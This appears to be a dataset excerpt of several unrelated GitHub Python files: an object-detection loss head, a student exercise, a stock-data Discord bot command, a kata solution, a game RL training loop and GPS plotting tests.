bbox_targets.append(bbox_target)\n\n return bbox_targets\n\n def transform_bbox_targets(self, decoded_bboxes, mlvl_points, num_imgs):\n \"\"\"Transform bbox_targets (x1, y1, x2, y2) into (l, t, r, b) format.\n Args:\n decoded_bboxes (list[Tensor]): Regression targets of each level,\n in the form of (x1, y1, x2, y2).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n num_imgs (int): the number of images in a batch.\n Returns:\n bbox_targets (list[Tensor]): Regression targets of each level in\n the form of (l, t, r, b).\n \"\"\"\n # TODO: Re-implemented in Class PointCoder\n assert len(decoded_bboxes) == len(mlvl_points)\n num_levels = len(decoded_bboxes)\n mlvl_points = [points.repeat(num_imgs, 1) for points in mlvl_points]\n bbox_targets = []\n for i in range(num_levels):\n bbox_target = bbox2distance(mlvl_points[i], decoded_bboxes[i])\n bbox_targets.append(bbox_target)\n\n return bbox_targets\n\n def get_pos_loss(self,\n cls_scores, bbox_preds, bbox_preds_refine,\n labels, label_weights,\n bbox_targets, bbox_weights,\n all_level_points,\n pos_inds):\n \"\"\"Calculate loss of all potential positive samples obtained from first\n match process.\n Args:\n anchors (list[Tensor]): Anchors of each scale.\n cls_score (Tensor): Box scores of single image with shape\n (num_anchors, num_classes)\n bbox_pred (Tensor): Box energies / deltas of single image\n with shape (num_anchors, 4)\n label (Tensor): classification target of each anchor with\n shape (num_anchors,)\n label_weight (Tensor): Classification loss weight of each\n anchor with shape (num_anchors).\n bbox_target (dict): Regression target of each anchor with\n shape (num_anchors, 4).\n bbox_weight (Tensor): Bbox weight of each anchor with shape\n (num_anchors, 4).\n pos_inds (Tensor): Index of all positive samples got from\n first assign process.\n Returns:\n Tensor: Losses of all positive samples in single image.\n \"\"\"\n num_pos = len(pos_inds)\n\n if self.sync_num_pos:\n num_pos_avg_per_gpu = reduce_mean(\n pos_inds.new_tensor(num_pos).float()).item()\n num_pos_avg_per_gpu = max(num_pos_avg_per_gpu, 1.0)\n else:\n num_pos_avg_per_gpu = num_pos\n\n # flatten_cls_scores = cls_scores.detach()\n # flatten_bbox_preds = bbox_preds.detach()\n # flatten_bbox_preds_refine = bbox_preds_refine.detach()\n #\n # flatten_labels = labels.detach()\n # flatten_labels_weights = label_weights.detach()\n # flatten_bbox_targets = bbox_targets.detach()\n # flatten_points = all_level_points.detach()\n\n pos_bbox_preds = bbox_preds[pos_inds]\n pos_bbox_preds_refine = bbox_preds_refine[pos_inds]\n\n pos_labels = labels[pos_inds]\n pos_bbox_targets = bbox_targets[pos_inds]\n pos_points = all_level_points[pos_inds]\n pos_scores = cls_scores[pos_inds]\n pos_labels_weight = label_weights[pos_inds]\n\n if not num_pos:\n return cls_scores.new([]),\n\n pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)\n pos_decoded_target_preds = distance2bbox(pos_points, pos_bbox_targets)\n iou_targets_ini = bbox_overlaps(\n pos_decoded_bbox_preds,\n pos_decoded_target_preds.detach(),\n is_aligned=True).clamp(min=1e-6)\n bbox_weights_ini = iou_targets_ini.clone().detach()\n # iou_targets_ini_avg_per_gpu = reduce_mean(\n # bbox_weights_ini.sum()).item()\n # bbox_avg_factor_ini = max(iou_targets_ini_avg_per_gpu, 1.0)\n bbox_avg_factor_ini = max(bbox_weights_ini.sum().item(), 1.0)\n\n loss_bbox = self.loss_bbox(\n pos_decoded_bbox_preds,\n pos_decoded_target_preds.detach(),\n weight=bbox_weights_ini,\n avg_factor=bbox_avg_factor_ini,\n reduction_override='none')\n\n pos_decoded_bbox_preds_refine = \\\n distance2bbox(pos_points, pos_bbox_preds_refine)\n iou_targets_rf = bbox_overlaps(\n pos_decoded_bbox_preds_refine,\n pos_decoded_target_preds.detach(),\n is_aligned=True).clamp(min=1e-6)\n bbox_weights_rf = iou_targets_rf.clone().detach()\n # iou_targets_rf_avg_per_gpu = reduce_mean(\n # bbox_weights_rf.sum()).item()\n iou_targets_rf_avg_per_gpu = bbox_weights_rf.sum().item()\n bbox_avg_factor_rf = max(iou_targets_rf_avg_per_gpu, 1.0)\n\n loss_bbox_refine = self.loss_bbox_refine(\n pos_decoded_bbox_preds_refine,\n pos_decoded_target_preds.detach(),\n weight=bbox_weights_rf,\n avg_factor=bbox_avg_factor_rf,\n reduction_override='none')\n\n # build IoU-aware cls_score targets\n if self.use_vfl:\n pos_ious = iou_targets_rf.clone().detach()\n cls_iou_targets = torch.zeros_like(cls_scores)\n cls_iou_targets[pos_inds, pos_labels] = pos_ious\n\n # if self.use_vfl:\n # target_iou = torch.zeros_like(pos_scores)\n # target_iou[:, pos_labels] = pos_ious\n # loss_cls = self.loss_cls(\n # pos_scores,\n # target_iou,\n # avg_factor=num_pos_avg_per_gpu,\n # reduction_override='none')\n # else:\n loss_cls = self.paa_assign_cls_loss(\n pos_scores,\n pos_labels,\n weight=pos_labels_weight,\n avg_factor=num_pos_avg_per_gpu,\n reduction_override='none')\n\n # loss_cls = loss_cls.sum(-1)\n pos_loss = loss_bbox + loss_bbox_refine + loss_cls.sum(-1)\n return pos_loss,\n # return 0,\n\n def paa_reassign(self, pos_losses, label, label_weight, bbox_weight,\n pos_inds, pos_gt_inds, anchors):\n \"\"\"Fit loss to GMM distribution and separate positive, ignore, negative\n samples again with GMM model.\n Args:\n pos_losses (Tensor): Losses of all positive samples in\n single image.\n label (Tensor): classification target of each anchor with\n shape (num_anchors,)\n label_weight (Tensor): Classification loss weight of each\n anchor with shape (num_anchors).\n bbox_weight (Tensor): Bbox weight of each anchor with shape\n (num_anchors, 4).\n pos_inds (Tensor): Index of all positive samples got from\n first assign process.\n pos_gt_inds (Tensor): Gt_index of all positive samples got\n from first assign process.\n anchors (list[Tensor]): Anchors of each scale.\n Returns:\n tuple: Usually returns a tuple containing learning targets.\n - label (Tensor): classification target of each anchor after\n paa assign, with shape (num_anchors,)\n - label_weight (Tensor): Classification loss weight of each\n anchor after paa assign, with shape (num_anchors).\n - bbox_weight (Tensor): Bbox weight of each anchor with shape\n (num_anchors, 4).\n - num_pos (int): The number of positive samples after paa\n assign.\n \"\"\"\n if not len(pos_inds):\n return label, label_weight, bbox_weight, 0\n\n num_gt = pos_gt_inds.max() + 1\n num_level = len(anchors)\n num_anchors_each_level = [item.size(0) for item in anchors]\n num_anchors_each_level.insert(0, 0)\n inds_level_interval = np.cumsum(num_anchors_each_level)\n pos_level_mask = []\n for i in range(num_level):\n mask = (pos_inds >= inds_level_interval[i]) & (\n pos_inds < inds_level_interval[i + 1]) #返回有效的pos_inds,并且将其拆解,分配到每个level上(维度不变,通true和false来表达当前level分配i情况)\n pos_level_mask.append(mask)\n pos_inds_after_paa = [label.new_tensor([])] #用于存储重新分配后的pos_inds\n ignore_inds_after_paa = [label.new_tensor([])]\n for gt_ind in range(num_gt):\n pos_inds_gmm = []\n pos_loss_gmm = []\n gt_mask = pos_gt_inds == gt_ind #逐个寻找符合要求的gt的mask\n for level in range(num_level):\n level_mask = pos_level_mask[level]\n level_gt_mask = level_mask & gt_mask #找到当前level,当前gt所对应的位置\n value, topk_inds = pos_losses[level_gt_mask].topk(\n min(level_gt_mask.sum(), self.topk), largest=False)\n pos_inds_gmm.append(pos_inds[level_gt_mask][topk_inds]) #记录造成最大loss的几个pos_inds\n pos_loss_gmm.append(value)\n pos_inds_gmm = torch.cat(pos_inds_gmm)\n pos_loss_gmm = torch.cat(pos_loss_gmm)\n # fix gmm need at least two sample\n if len(pos_inds_gmm) < 2:\n continue\n device = pos_inds_gmm.device\n pos_loss_gmm, sort_inds = pos_loss_gmm.sort()\n pos_inds_gmm = pos_inds_gmm[sort_inds]\n pos_loss_gmm = pos_loss_gmm.view(-1, 1).cpu().numpy()\n min_loss, max_loss = pos_loss_gmm.min(), pos_loss_gmm.max()\n means_init = np.array([min_loss, max_loss]).reshape(2, 1)\n weights_init = np.array([0.5, 0.5])\n precisions_init = np.array([1.0, 1.0]).reshape(2, 1, 1) # full\n # if self.covariance_type == 'spherical':\n # precisions_init = precisions_init.reshape(2)\n # elif self.covariance_type == 'diag':\n # precisions_init = precisions_init.reshape(2, 1)\n # elif self.covariance_type == 'tied':\n # precisions_init = np.array([[1.0]])\n # if skm is None:\n # raise ImportError('Please run \"pip install sklearn\" '\n # 'to install sklearn first.')\n # gmm = skm.GaussianMixture(\n # 2,\n # weights_init=weights_init,\n # means_init=means_init,\n # precisions_init=precisions_init,\n # covariance_type=self.covariance_type)\n gmm = skm.GaussianMixture(\n 2,\n weights_init=weights_init,\n means_init=means_init,\n precisions_init=precisions_init,\n covariance_type='full')\n gmm.fit(pos_loss_gmm)\n gmm_assignment = gmm.predict(pos_loss_gmm)\n scores = gmm.score_samples(pos_loss_gmm)\n gmm_assignment = torch.from_numpy(gmm_assignment).to(device)\n scores = torch.from_numpy(scores).to(device)\n pos_inds_temp, ignore_inds_temp = self.gmm_separation_scheme(\n gmm_assignment, scores, pos_inds_gmm) #ignore_inds_temp永远只返回空的? gmm中0值为正样本,这一边相当于筛选正样本\n pos_inds_after_paa.append(pos_inds_temp)\n ignore_inds_after_paa.append(ignore_inds_temp)\n pos_inds_after_paa = torch.cat(pos_inds_after_paa)\n ignore_inds_after_paa = torch.cat(ignore_inds_after_paa)\n reassign_mask = (pos_inds.unsqueeze(1) != pos_inds_after_paa).all(1)\n reassign_ids = pos_inds[reassign_mask] #需要被重新分配的id\n label[reassign_ids] = self.num_classes\n label_weight[ignore_inds_after_paa] = 0\n bbox_weight[reassign_ids] = 0\n num_pos = len(pos_inds_after_paa)\n return label, label_weight, bbox_weight, num_pos\n\n def gmm_separation_scheme(self, gmm_assignment, scores, pos_inds_gmm):\n \"\"\"A general separation scheme for gmm model.\n It separates a GMM distribution of candidate samples into three\n parts, 0 1 and uncertain areas, and you can implement other\n separation schemes by rewriting this function.\n Args:\n gmm_assignment (Tensor): The prediction of GMM which is of shape\n (num_samples,). The 0/1 value indicates the distribution\n that each sample comes from.\n scores (Tensor): The probability of sample coming from the\n fit GMM distribution. The tensor is of shape (num_samples,).\n pos_inds_gmm (Tensor): All the indexes of samples which are used\n to fit GMM model. The tensor is of shape (num_samples,)\n Returns:\n tuple[Tensor]: The indices of positive and ignored samples.\n - pos_inds_temp (Tensor): Indices of positive samples.\n - ignore_inds_temp (Tensor): Indices of ignore samples.\n \"\"\"\n # The implementation is (c) in Fig.3 in origin paper intead of (b).\n # You can refer to issues such as\n # https://github.com/kkhoot/PAA/issues/8 and\n # https://github.com/kkhoot/PAA/issues/9.\n fgs = gmm_assignment == 0\n pos_inds_temp = fgs.new_tensor([], dtype=torch.long)\n ignore_inds_temp = fgs.new_tensor([], dtype=torch.long)\n if fgs.nonzero().numel():\n _, pos_thr_ind = scores[fgs].topk(1)\n pos_inds_temp = pos_inds_gmm[fgs][:pos_thr_ind + 1]\n ignore_inds_temp = pos_inds_gmm.new_tensor([])\n return pos_inds_temp, ignore_inds_temp\n\n\n\n def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,\n missing_keys, unexpected_keys, error_msgs):\n \"\"\"Override the method in the parent class to avoid changing para's\n name.\"\"\"\n pass","repo_name":"HAOCHENYE/yehc_mmdet","sub_path":"mmdet/models/dense_heads/vfocal_paa_private_head.py","file_name":"vfocal_paa_private_head.py","file_ext":"py","file_size_in_byte":57398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"2049648837","text":"from random import randint\n\n\n\n\n\nclass DataTrans :\n\n def __init__(self):\n DataTrans.D()\n \n d = []\n n=0\n S=0\n\n def f(x):\n return ((x**3) + 3*(x**2) - 5)\n\n\n \n def N():\n global S\n n = []\n for i in range(S):\n n.append(randint(0,100))\n return n\n\n\n def detD():\n global d\n global S\n global n\n for i in range(n):\n DataTrans.d.append(DataTrans.N())\n\n def saisi():\n global n\n global S\n try:\n n= int(input(\"Nombre d'element de la liste : \"))\n S=int(input(\"Veuillez entrer la taille de chaque element : \"))\n except ValueError:\n print(\"Veuillez renseignr que des entier\")\n DataTrans.saisi()\n else:\n DataTrans.detD()\n\n def D():\n global d\n global S\n global n\n for i in range(n):\n DataTrans.d.append(DataTrans.N())\n print(DataTrans.d)\n return DataTrans.d\n\n\n def mini(x):\n minn = x[0]\n for i in x:\n if imaxx:\n maxx=i\n return maxx\n\n\n def maxEtMin():\n k = []\n l=[]\n global d\n for i in DataTrans.d:\n k.append(DataTrans.mini(i))\n l.append(DataTrans.maxi(i))\n print(f\"Min {k} Max {l} ||| Min Global : {DataTrans.mini(k)}, Max Global : {DataTrans.maxi(l)}\")\n return (f\"Min {k} Max {l} \"), (f\"Min Global : {DataTrans.mini(k)}, Max Global : {DataTrans.maxi(l)}\")\n\n\n def calculFTableau(x):\n resultat = []\n for i in x:\n resultat.append(DataTrans.f(i))\n return resultat\n\n\n def DPrim():\n result = []\n global d\n for i in DataTrans.d:\n result.append(DataTrans.calculFTableau(i))\n print(f\"Les D' pour element de D sont respectivement : {result}\")\n return result\n\n\n# DataTrans.D()\n# DataTrans.maxEtMin()\n# DataTrans.DPrim()","repo_name":"hkeyz/odc","sub_path":"Tp Python/Exercice3/exercice2.py","file_name":"exercice2.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15717789007","text":"import logging\n\nimport disnake\nimport pandas as pd\nimport requests\n\nfrom bots import imps\nfrom openbb_terminal.decorators import log_start_end\n\nlogger = logging.getLogger(__name__)\n\n\n@log_start_end(log=logger)\ndef reverse_repo_command(days: int = 50):\n \"\"\"Displays Reverse Repo [Stocksera.com]\"\"\"\n\n # Debug user input\n if imps.DEBUG:\n logger.debug(\"dd repo %s\", days)\n\n df = pd.DataFrame(\n requests.get(\n f\"https://stocksera.pythonanywhere.com/api/reverse_repo/?days={str(days)}\"\n ).json()\n )\n\n if df.empty:\n raise Exception(\"No Data Found\")\n\n title = \"Reverse Repo [Stocksera]\"\n\n df[\"Difference\"] = df[\"Amount\"].diff().fillna(0)\n\n formats = {\n \"Amount\": \"${:.2f}B\",\n \"Average\": \"${:.2f}B\",\n \"Difference\": \"${:.2f}B\",\n }\n for col, value in formats.items():\n df[col] = df[col].map(lambda x: value.format(x)) # pylint: disable=W0640\n\n df = df.drop(columns=\"Moving Avg\")\n df = df.sort_values(by=\"Date\", ascending=False)\n\n font_color = [\"white\"] * 4 + [\n [\n \"#e4003a\" if boolv else \"#00ACFF\"\n for boolv in df[\"Difference\"].str.contains(\"-\")\n ] # type: ignore\n ]\n\n df.set_index(\"Date\", inplace=True)\n df.columns = df.columns.str.capitalize()\n\n dindex = len(df.index)\n if dindex > 15:\n embeds: list = []\n # Output\n i, i2, end = 0, 0, 15\n df_pg, embeds_img, images_list = pd.DataFrame(), [], []\n while i < dindex:\n df_pg = df.iloc[i:end]\n font_color = [\"white\"] * 4 + [\n [\n \"#e4003a\" if boolv else \"#00ACFF\"\n for boolv in df_pg[\"Difference\"].str.contains(\"-\")\n ] # type: ignore\n ]\n df_pg.append(df_pg)\n fig = imps.plot_df(\n df_pg,\n fig_size=(650, (40 + (40 * len(df.index)))),\n col_width=[1.8, 1.5, 1.7, 1.3, 1.8],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n fig.update_traces(\n cells=(\n dict(\n align=[\"center\", \"right\", \"center\", \"right\"],\n font=dict(color=font_color),\n )\n )\n )\n imagefile = \"dd_r_repo.png\"\n imagefile = imps.save_image(imagefile, fig)\n\n if imps.IMAGES_URL or not imps.IMG_HOST_ACTIVE:\n image_link = imps.multi_image(imagefile)\n images_list.append(imagefile)\n else:\n image_link = imps.multi_image(imagefile)\n\n embeds_img.append(\n f\"{image_link}\",\n )\n embeds.append(\n disnake.Embed(\n title=title,\n colour=imps.COLOR,\n ),\n )\n i2 += 1\n i += 15\n end += 15\n\n # Author/Footer\n for i in range(0, i2):\n embeds[i].set_author(\n name=imps.AUTHOR_NAME,\n url=imps.AUTHOR_URL,\n icon_url=imps.AUTHOR_ICON_URL,\n )\n embeds[i].set_footer(\n text=imps.AUTHOR_NAME,\n icon_url=imps.AUTHOR_ICON_URL,\n )\n\n i = 0\n for i in range(0, i2):\n embeds[i].set_image(url=embeds_img[i])\n\n i += 1\n embeds[0].set_footer(text=f\"Page 1 of {len(embeds)}\")\n choices = [\n disnake.SelectOption(label=\"Home\", value=\"0\", emoji=\"🟢\"),\n ]\n\n output = {\n \"view\": imps.Menu,\n \"title\": title,\n \"embed\": embeds,\n \"choices\": choices,\n \"embeds_img\": embeds_img,\n \"images_list\": images_list,\n }\n else:\n fig = imps.plot_df(\n df,\n fig_size=(650, (40 + (40 * len(df.index)))),\n col_width=[1.8, 1.5, 1.7, 1.3, 1.8],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n fig.update_traces(\n cells=(\n dict(\n align=[\"center\", \"right\", \"center\", \"right\"],\n font=dict(color=font_color),\n )\n )\n )\n imagefile = \"dd_r_repo.png\"\n imagefile = imps.save_image(imagefile, fig)\n\n output = {\n \"title\": title,\n \"imagefile\": imagefile,\n }\n return output\n","repo_name":"rohankumardubey/OpenBBTerminal","sub_path":"bots/economy/reverse_repo.py","file_name":"reverse_repo.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29214592243","text":"# http://www.codewars.com/kata/repeated-substring/train/python\n\ndef f(s):\n first = True\n completed = False\n prev = \"\"\n current = \"\"\n minimum = len(s)\n for i in range(1, len(s)/2 + 1):\n first = True\n completed = True\n for j in range(0, len(s), i):\n p = s[j:j+i]\n if first:\n prev = p\n else:\n if p != prev:\n completed = False\n break\n \n first = False\n if completed:\n if len(prev) < minimum:\n minimum = len(prev)\n \n if len(s) / minimum <= 1:\n return (s, 1)\n else:\n return (s[0: minimum], len(s) / minimum)","repo_name":"PeterPython/problems","sub_path":"codewars/repeated_substring/repeated_substring.py","file_name":"repeated_substring.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14914286007","text":"import pygame\r\nimport torch\r\nimport json\r\nimport os\r\nimport numpy as np\r\n\r\nfrom tqdm import tqdm\r\nimport argparse\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom game import Game\r\nfrom rl_training import QLearningAI\r\nfrom rewards_values import Rewards\r\n\r\n\r\nSCREEN_WIDTH = 1000\r\nSCREEN_HEIGHT = 900\r\n\r\n\r\nclass TrainingSession:\r\n def __init__(self, silent=False, n_games=500, episode_max_length=5, replay_buffer_size=500):\r\n self.silent = silent\r\n self.n_games = n_games\r\n self.episode_max_length = episode_max_length\r\n self.replay_buffer_size = replay_buffer_size\r\n self.rewards = []\r\n\r\n def start_training(self):\r\n print(f'Start the training with the following parameters:')\r\n print(f' Silent mode: {self.silent}')\r\n print(f' Number of games: {self.n_games}')\r\n print(f' Maximum episode length: {self.episode_max_length}')\r\n print(f' Replay buffer size: {self.replay_buffer_size}')\r\n print('\\n\\n')\r\n\r\n if not self.silent:\r\n pygame.init()\r\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n screen.fill((255, 255, 255))\r\n clock = pygame.time.Clock()\r\n clock.tick(60)\r\n else:\r\n screen = None\r\n\r\n n_games = self.n_games\r\n episode_max_length = self.episode_max_length\r\n\r\n with open('init_states/training_configs/1vs1_v2.json', 'r', encoding='utf-8') as f:\r\n config = json.load(f)\r\n\r\n start_game_index = 1#450\r\n\r\n models = None\r\n replay_buffer = None\r\n\r\n best_reward = float('-inf')\r\n \r\n for i in tqdm(range(start_game_index, n_games)):\r\n game = Game(config, screen, None, sound_on=False, autoplay=True, autoplay_max_turns=episode_max_length,\r\n replay_buffer_size=self.replay_buffer_size, silent=self.silent)\r\n models, replay_buffer = game.players[0].ai.init(i, *(models, replay_buffer))\r\n queued_rewards = []\r\n\r\n rl_player = game.players[0]\r\n\r\n game.start()\r\n\r\n game.turn_number = 1\r\n game.subturn_number = 0\r\n while True:\r\n # continue\r\n current_player = game.get_current_player()\r\n\r\n if not self.silent:\r\n print(f'\\n\\n== [Game {i}] {current_player.nation} started the turn {game.turn_number} '\r\n f'with {len(current_player.units)} units and {len(current_player.cities)} cities: ==')\r\n\r\n game.logger.start_turn(current_player.nation)\r\n\r\n # The most important lines:\r\n if current_player == rl_player:\r\n current_player.create_paths(queued_rewards=queued_rewards) \r\n queued_rewards = []\r\n else:\r\n current_player.create_paths()\r\n\r\n if game.turn_number > episode_max_length:\r\n self.handle_game_end(rl_player, is_victory=False)\r\n break\r\n\r\n if game.check_winning_conditions(current_player, no_units_eq_lose=True):\r\n self.handle_game_end(rl_player, isinstance(current_player.ai, QLearningAI))\r\n break\r\n\r\n for obj in current_player.game_objects:\r\n res = obj.move(game, calc_rewards_for=[rl_player])[rl_player]\r\n queued_rewards.extend(res)\r\n\r\n obj.gain_hps()\r\n\r\n obj.mp = obj.mp_base\r\n obj.can_attack = True\r\n obj.is_selected = False\r\n\r\n if game.check_winning_conditions(current_player, no_units_eq_lose=True):\r\n self.handle_game_end(rl_player, isinstance(current_player.ai, QLearningAI))\r\n break\r\n\r\n # ----------------------------------\r\n # next player\r\n game.set_next_current_player()\r\n game.update()\r\n\r\n game.logger.commit()\r\n\r\n game.current_turn_text.update(turn_number=game.turn_number)\r\n game.current_player_text.update(current_player=current_player.nation)\r\n game.update()\r\n\r\n game.subturn_number += 1\r\n if game.subturn_number % len(game.players) == 0:\r\n game.turn_number += 1\r\n\r\n game_reward = rl_player.ai.replay_buffer.get_last_game_total_reward()\r\n print(f'At the end of the game {i}, the rewards: {game_reward}')\r\n self.rewards.append(game_reward)\r\n\r\n if game_reward > best_reward:\r\n best_reward = game_reward\r\n torch.save(models[0].state_dict(), f'weights/best_online_model_game_{str(i).zfill(5)}_score_{game_reward}.pt')\r\n torch.save(models[1].state_dict(), f'weights/best_reference_model_game_{str(i).zfill(5)}_score_{game_reward}.pt')\r\n\r\n if i % 100 == 0:\r\n torch.save(models[0].state_dict(), f'weights/online_model_game_{str(i).zfill(5)}.pt')\r\n torch.save(models[1].state_dict(), f'weights/reference_model_game_{str(i).zfill(5)}.pt')\r\n\r\n self.plot_rewards(f'rewards_history/game_{str(i).zfill(5)}.png')\r\n\r\n rl_player.ai.update_models()\r\n\r\n self.plot_rewards('rewards_history/final_result.png')\r\n\r\n def handle_game_end(self, rl_player, is_victory):\r\n reward_value = Rewards.get_named_reward(Rewards.VICTORY) if is_victory else Rewards.get_named_reward(Rewards.DEFEAT)\r\n print('QLearningAI won!' if is_victory else 'QLearningAI lost')\r\n\r\n if is_victory:\r\n print()\r\n \r\n for transition in rl_player.ai.replay_buffer.get_unfinished_transitions():\r\n rl_player.ai.replay_buffer.update_new_state_and_reward(turn_number=transition.turn_number,\r\n unit=transition.unit,\r\n new_state=None,\r\n additional_reward=reward_value,\r\n new_state_legal_action=None,)\r\n\r\n if not self.silent:\r\n print(f'Replay buffer final state:')\r\n print(rl_player.ai.replay_buffer)\r\n\r\n @staticmethod\r\n def running_average(data, window_size):\r\n window = np.ones(window_size) / window_size\r\n return np.convolve(data, window, mode='valid')\r\n\r\n def plot_rewards(self, path):\r\n plt.figure(figsize=(10, 5))\r\n plt.plot(self.rewards, label='rewards')\r\n plt.plot(self.running_average(self.rewards, 50))\r\n \r\n plt.legend()\r\n plt.savefig(path)\r\n\r\n @staticmethod\r\n def cls():\r\n os.system('cls' if os.name=='nt' else 'clear')\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description=\"Start a training session.\")\r\n parser.add_argument('--n_games', type=int, default=500, help=\"Number of games to play.\")\r\n parser.add_argument('--replay_buffer_size', type=int, default=500, help=\"Size of the replay buffer.\")\r\n parser.add_argument('--episode_max_length', type=int, default=5, help=\"Maximum length of an episode.\")\r\n parser.add_argument('--silent', action='store_true', help=\"Run in silent mode without displaying the game.\")\r\n args = parser.parse_args()\r\n\r\n TrainingSession.cls()\r\n print(args.silent)\r\n ts = TrainingSession(silent=args.silent, n_games=args.n_games,\r\n episode_max_length=args.episode_max_length, replay_buffer_size=args.replay_buffer_size)\r\n ts.start_training()\r\n","repo_name":"tikhonovpavel/civ_vi_ai","sub_path":"start_training.py","file_name":"start_training.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13041787853","text":"from decimal import Decimal\n\nimport pytest\n\nimport numpy\n\nfrom matplotlib import pyplot\n\nfrom astropy.units import Unit\n\nfrom .. import gps as plot_gps\nfrom ...time import LIGOTimeGPS\n\n\nclass TestGPSMixin(object):\n TYPE = plot_gps.GPSMixin\n\n def test_init(self):\n m = self.TYPE()\n assert m.unit is None\n assert m.epoch is None\n m = self.TYPE(unit='second', epoch=100)\n assert m.unit is Unit('second')\n assert m.epoch == 100.\n\n @pytest.mark.parametrize('in_, out', [\n (None, None),\n (1, 1.),\n ('1', 1.),\n (Decimal(12345), 12345.),\n (numpy.float32(56789), 56789.),\n (LIGOTimeGPS(1234567890, 123000000), 1234567890.123),\n ])\n def test_epoch(self, in_, out):\n mix = self.TYPE(epoch=in_)\n assert mix.epoch == out\n\n @pytest.mark.parametrize('in_, out', [\n (None, None),\n (Unit('second'), Unit('second')),\n (3600, Unit('hour')),\n ('week', Unit('week')),\n ('weeks', Unit('week')),\n ])\n def test_unit(self, in_, out):\n mix = self.TYPE(unit=in_)\n assert mix.unit == out\n\n @pytest.mark.parametrize('badunit', [\n 'blah', # not a unit\n 'meter', # not a time unit\n 'yoctoday', # not a supported time unit\n ])\n def test_unit_error(self, badunit):\n with pytest.raises(ValueError):\n self.TYPE(unit=badunit)\n\n @pytest.mark.parametrize('unit, name', [\n (None, None),\n ('second', 'seconds'),\n ])\n def test_get_unit_name(self, unit, name):\n mix = self.TYPE(unit=unit)\n assert mix.get_unit_name() == name\n\n @pytest.mark.parametrize('unit, scale', [\n (None, 1),\n ('second', 1),\n ('minute', 60),\n ('hour', 3600),\n ])\n def test_scale(self, unit, scale):\n mix = self.TYPE(unit=unit)\n assert mix.scale == scale\n\n\nclass TestGpsTransform(TestGPSMixin):\n TRANSFORM = plot_gps.GPSTransform\n EPOCH = 100.0\n UNIT = 'minutes'\n SCALE = 60.\n X = 190.0\n A = 90.0\n B = 19/6.\n C = 1.5\n\n def test_init(self):\n t = self.TRANSFORM()\n assert t.transform(1.0) == 1.0\n\n def test_epoch(self):\n transform = self.TRANSFORM(epoch=self.EPOCH)\n assert transform.get_epoch() == self.EPOCH\n assert transform.transform(self.X) == self.A\n assert numpy.isclose(\n transform.inverted().transform(transform.transform(self.X)),\n self.X)\n\n def test_scale(self):\n transform = self.TRANSFORM(unit=self.UNIT)\n assert transform.get_scale() == self.SCALE\n assert transform.transform(self.X) == self.B\n assert numpy.isclose(\n transform.inverted().transform(transform.transform(self.X)),\n self.X)\n\n def test_epoch_and_scale(self):\n transform = self.TRANSFORM(epoch=self.EPOCH, unit=self.UNIT)\n assert transform.transform(self.X) == self.C\n assert numpy.isclose(\n transform.inverted().transform(transform.transform(self.X)),\n self.X)\n\n\nclass TestInverseGpsTransform(TestGpsTransform):\n TRANSFORM = plot_gps.InvertedGPSTransform\n A = 290.0\n B = 11400.0\n C = 11500.0\n\n\n@pytest.mark.parametrize(\n 'scale',\n sorted(filter(lambda x: x != 'auto-gps', plot_gps.GPS_SCALES)),\n)\ndef test_gps_scale(scale):\n u = Unit(scale[:-1])\n\n fig = pyplot.figure()\n ax = fig.add_subplot(xscale=scale)\n if scale == 'years':\n x = numpy.arange(50)\n else:\n x = numpy.arange(1e2)\n ax.plot(x * u.decompose().scale, x)\n fig.canvas.draw()\n xscale = ax.get_xaxis()._scale\n assert xscale.get_unit() == Unit(scale[:-1])\n pyplot.close(fig)\n\n\n@pytest.mark.parametrize('scale, unit', [\n (1e-5, 'ms'),\n (1e-4, 'ms'),\n (1e-3, 's'),\n (1e-2, 's'),\n (1e-1, 's'),\n (1e0, 's'),\n (1e1, 'min'),\n (1e2, 'min'),\n (1e3, 'h'),\n (1e4, 'd'),\n (1e5, 'wk'),\n (1e6, 'wk'),\n (1e7, 'yr'),\n])\ndef test_auto_gps_scale(scale, unit):\n fig = pyplot.figure()\n ax = fig.add_subplot(xscale='auto-gps')\n ax.plot(numpy.arange(1e2) * scale, numpy.arange(1e2))\n xscale = ax.get_xaxis()._scale\n transform = xscale.get_transform()\n assert transform.unit.name == unit\n pyplot.close(fig)\n\n\ndef test_gps_formatting():\n fig = pyplot.figure()\n try:\n ax = fig.gca()\n ax.set_xscale('seconds', epoch=1238040211.67)\n ax.set_xlim(1238040211.17, 1238040212.17)\n fig.canvas.draw()\n ticks = [\"-0.5\", \"-0.4\", \"-0.3\", \"-0.2\", \"-0.1\",\n \"0\", \"0.1\", \"0.2\", \"0.3\", \"0.4\", \"0.5\"]\n assert [x.get_text() for x in ax.get_xticklabels()] == ticks\n finally:\n pyplot.close(fig)\n","repo_name":"gwpy/gwpy","sub_path":"gwpy/plot/tests/test_gps.py","file_name":"test_gps.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"3"} +{"seq_id":"72843634321","text":"# import 